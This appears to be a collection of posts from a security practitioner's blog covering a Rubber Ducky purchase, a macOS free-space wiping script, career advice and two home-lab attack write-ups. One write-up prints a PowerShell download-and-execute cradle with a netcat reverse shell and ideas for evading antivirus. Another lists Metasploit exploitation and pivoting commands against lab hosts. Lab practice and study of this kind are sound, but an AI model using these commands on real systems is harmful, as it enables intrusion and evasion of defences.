Just picked up the legendary Hak5 Rubber Ducky — and I couldn’t be more excited. 🐤💻

For those unfamiliar, this seemingly innocent USB device acts like a keyboard and can execute preloaded keystroke injection payloads the moment it’s plugged in. It’s been used in countless red team exercises, penetration tests, and security demos — and now it’s my turn to dig in.

I got this tool not just for fun (though let’s be real, it is fun) — but to level up my hands-on skills in offensive security. My plan over the next few weeks is to:

• Write and customize payloads using DuckyScript and other scripting languages
• Simulate real-world attack scenarios in a controlled lab environment
• Study how endpoint protection and security controls respond
• Learn more about device trust, physical security, and human factor vulnerabilities

Offensive security is something I’ve been passionate about for a while, and adding tools like this to my lab gives me more than just technical practice — it sharpens my mindset. Thinking like an attacker helps build stronger defenses, and I’m all about bridging that red/blue gap.

If you’ve worked with the Rubber Ducky, I’d love to hear your favorite payloads, tips, or use cases. I’m diving in deep and will share anything interesting I learn along the way.

#CyberSecurity #EthicalHacking #Hak5 #RubberDucky #RedTeam #PenTesting #OffSec #LearningInPublic #HandsOnHacking #PhysicalSecurity

So, you want those embarrassing photos and videos of you while you were drunk to never see the light of day? Deleting them from your trash bin isn’t good enough.

When you delete a file on macOS (or any OS), the data isn’t really erased – only the index or pointer to that file is removed. The actual data remains on the disk until it’s overwritten by something else.

So tools like photo recovery apps, forensic tools, or law enforcement utilities can scan unallocated space and rebuild deleted files – unless that space has been overwritten.

Here’s how to wipe your free space, for good.

Command 1 – Create a large junk file to take up free space (Note: Leave enough space for MacOS to function properly. If you have 210gb free in your storage – create a 195gb file)

dd if=/dev/urandom of="$HOME/largejunkfile" bs=1m count=195000 // creates 195gb junk file

Command 2 – Wipe file

rm "$HOME/largejunkfile" // erases that same junk file

If you’d like to automate this process, you can simply save the code below as wipefreespace.sh on your mac, open terminal (or iterm2) and run chmod +x wipefreespace.sh to make it executable, and then while in terminal run ./wipefreespace.sh

#!/bin/bash

count=1

echo “Script started at: $(date ‘+%Y-%m-%d %H:%M:%S’)”

while true; do

echo “=== Run #$count ===”

echo “Creating file (120gb)…”

dd if=/dev/urandom of=”$HOME/largejunkfile” bs=1m count=120000

echo “Junk file created”

sleep 10

echo “Deleting file…”

rm -f “$HOME/largejunkfile”

echo “Cycle #$count complete.”

((count++))

done

This will result in the following output:

Even though SSDs do wear leveling (randomizing physical writes to prolong lifespan), every time you do a pass with dd:

• You’re more likely to hit different sectors with each write.
• Over multiple passes, you touch a very high percentage of unallocated space.
• TRIM (enabled on macOS) also helps by marking deleted blocks as ready to be cleaned.

Together, these factors make data recovery from deleted files virtually impossible.

Today I spent some time testing how much I could get away with on a freshly updated version of Windows 11 Pro on server hardware. Using nothing but Living off the Land (LoL) binaries, I was surprised by just how much slipped through unnoticed.

I simulated a malicious payload delivery by locally hosting a ps1 script (lsass.ps1) that I created via python -m http.server. Then, using Powershell I ran the following on the victim:

$wc = New-Object System.Net.WebClient

$code = $wc.DownloadString(“http://10.0.0.21/lsass.ps1”)

Invoke-Expression $code

This made an HTTP GET request to retrieve the payload, and executed it in memory using Invoke-Expression. Within lsass.ps1 is instruction to connect back to a simple netcat listener running on my mac via  “nc -lv 8877”

Weirdly enough, the above executed successfully with tamper protection and all other Virus & Threat Protection settings enabled.

Once the malicious code was loaded into memory, I had full terminal access without much resistance from AV.

There’s still more I could have done to increase stealth.. obfuscating network indicators, modifying the user-agent, using HTTPS with a self-signed or trusted certificate, or even embedding the malicious IP in a STEAM profile name and having the script parse the profile page to extract and redirect to it. I’ve seen this technique used in real-world attacks – it’s surprisingly effective (and creative).

Anyway, I don’t have much of a social life these days obviously.

Also – completely off topic but the new MacOS Tahoe is ICONIC. I’m loving it so far, even though it’s made troubleshooting one of my apps on the app store exceedingly challenging.

#Hacking #CyberSecurity #OffensiveSecurity #Pentesting #PenetrationTesting #Windows11 #Defender #Windows11Pro

☕ Blue Teams Have all The Fun 💅💅

One of the things I 🥰 LOVE 🥰 about cybersecurity is the thrill of a suspicious alert. Don’t get me wrong, those moments can be terrifying, but I’d be lying if I said the investigation process isn’t addicting.. like a reverse capture the flag 😰😅

There’s a high that comes from diving into the unknown: pivoting off a flagged IP, pulling DNS logs, mapping outbound traffic, or correlating with known threat intel. I’ll dig into endpoint telemetry to identify which process spawned the connection, check for abnormal child processes, review PowerShell or command-line history, and correlate it all with authentication logs – whether onprem or in Entra.

It’s like building a timeline from raw noise – network logs, OS artifacts, user behavior, and making sense of something that wasn’t supposed to happen. Sometimes it’s benign, (okay, 98% of the time it’s benign), but sometimes it’s not and every alert is a chance to sharpen your skillset and play a game of “catch me if you can?” 💻

🔹 Security sits downstream – Before you defend a system, you have to understand how it works. Networking, operating systems, programming, scripting, cloud, AD… It’s a lot to learn first.

🔹 The stakes are high – In cybersecurity, mistakes can mean breaches, reputational damage, or costly regulatory fines. So orgs hesitate to trust true beginners.

🔹 Lack of real mentorship pipelines – Many companies don’t invest in training. They want you productive on day one.

The reality? Most “entry-level” roles expect prior IT experience – helpdesk, sysadmin, development, networking, etc.

If you’re trying to break in, I recommend the following:

Learning foundational IT skills

Building home labs (TryHackMe, HTB, virtual labs)

Getting hands-on certs (e.g., CompTIA Security+, A+/Network+)

Starting in adjacent roles and pivoting

If you’re not in cybersecurity yet but are eager to break in, remember – at the end of the day, it’s just a job. Like any role, it comes with accountability, responsibilities, deadlines, and deliverables. It’s not glamorous, and it doesn’t live up to the exaggerated hype often seen on social media. Cybersecurity is important, but it’s also routine, structured work – just like any other profession.

#CyberSecurity #EntryLevel #BreakIntoCyber #RealTalk #InfoSecCareers

command: "ping -c 4 demo1.ine.local"
Checks if the target machine is reachable via ICMP.

---

command: "nmap demo1.ine.local"
Performs a basic scan to discover open ports on the target machine.

command: "nmap -sV -p80 demo1.ine.local"
Performs service version detection on port 80 to identify the running service.

---

command: "searchsploit hfs"
Searches for known exploits related to ‘hfs’ using the local exploit database.

---

command: "msfconsole"
Starts the Metasploit Framework console.

command: "use exploit/windows/http/rejetto_hfs_exec"
Loads the Rejetto HFS exploit module in Metasploit.

command: "set RHOSTS demo1.ine.local"
Sets the target IP address for the exploit module.

command: "exploit"
Runs the exploit, which should give a Meterpreter shell on the target.

command: "ipconfig"
Shows the IP configuration of the compromised system to identify network details.

---

command: "run autoroute -s 10.0.16.0/20"
Adds a route inside Meterpreter to enable pivoting into the internal network.

command: "background"
Sends the Meterpreter session to the background so we can use other modules.

---

command: "use auxiliary/scanner/portscan/tcp"
Loads the TCP port scanner module in Metasploit.

command: "use auxiliary/scanner/discovery/arp_scanner"
Loads the ARP scanner module in Metasploit, used for discovering live hosts on the internal network through pivot.

command: "set RHOSTS demo2.ine.local"
Sets the target to the internal machine (victim machine 2).

command: "set PORTS 1-100"
Specifies the port range to scan (1 to 100).

command: "exploit"
Runs the port scan to discover open ports on the internal machine.

---

command: "sessions -i 1"
Returns to the existing Meterpreter session.

command: "portfwd add -l 1234 -p 80 -r demo2.ine.local"
Forwards the remote port 80 of victim 2 to local port 1234 on the attacker machine.

command: "portfwd list"
Lists active port forwarding rules to confirm it’s set up correctly.

command: "nmap -sV -sS -p 1234 localhost"
Scans the locally forwarded port to identify the running service on the internal host (BadBlue).

---

command: "searchsploit badblue 2.7"
Searches for known exploits targeting BadBlue 2.7.

command: "use exploit/windows/http/badblue_passthru"
Loads the BadBlue PassThru exploit module.

command: "set PAYLOAD windows/meterpreter/bind_tcp"
Sets the payload to use bind TCP (target listens, attacker connects).

command: "set RHOSTS demo2.ine.local"
Sets the target IP for the BadBlue exploit.

command: "exploit"
Executes the exploit, aiming to get a Meterpreter shell on victim 2.

---

command: "shell"
Switches from Meterpreter to a normal command shell on the target.

command: "cd /"
Navigates to the root directory.

command: "dir"
Lists files and directories in the current path.

command: "type flag.txt"
Displays the contents of ‘flag.txt’, revealing the flag.

I really enjoyed this course overall. I took the six-day live online version, fully covered by my employer, and found it focused primarily on offensive security while still incorporating a solid amount of blue team content. There was also a strong emphasis on cloud security, which I appreciated.

I’ll be taking my time preparing for the exam – it’s a big one. I have access to two practice tests that should help me gauge my readiness. One key component is CyberLive, which involves writing actual commands and interacting with live systems. To prepare for that, I plan to build a detailed index (cheat sheet) and go through all the labs again to make sure I’m confident and ready.

I’m excited, but I won’t be scheduling the exam for a few months since things are pretty hectic right now. I’ll keep you all posted when I eventually sit the exam (and likely fail spectacularly – but we’ll see!).

• It’s mostly meetings, audits, report writing/reading, and then more meetings. Yes, there is a large technical component, but it’s often overshadowed by paper pushing. This isn’t just true for blue teams – it applies to red teams too. One pentest report could have 12–15 pages dedicated to one IDOR vulnerability.

• Cybersecurity degrees are almost never worth it. College is great, and it’s even better when you’re studying a tried and true degree like Computer Science, which will always offer value well into the future. Howevr, cybersecurity is not an entry level field, and very few people actually graduate and move directly into a JR Sec Analyst/SOC role. It just doesn’t happen. You’re better off doing a 2 year IT program that covers computer science fundamentals/programming from an accredited school, or a 4 year CS degree from a traditional university. If neither of those are an option due to cost or flexibility, then go for certificates from known and reputable vendors – not some random LinkedIn Learning module nobody has heard of..

• You’re going to need knowledge across several domains: networking, programming, OS architecture (deep familiarity with Windows, Linux, and macOS internals.. especially command line, file systems, permissions, processes, and memory), incident response, risk management, threat analysis, and much more. Most importantly, soft skills. You will not get hired if people don’t want to work with you.

Seriously, you need to be aware of this if you’re not already 🙂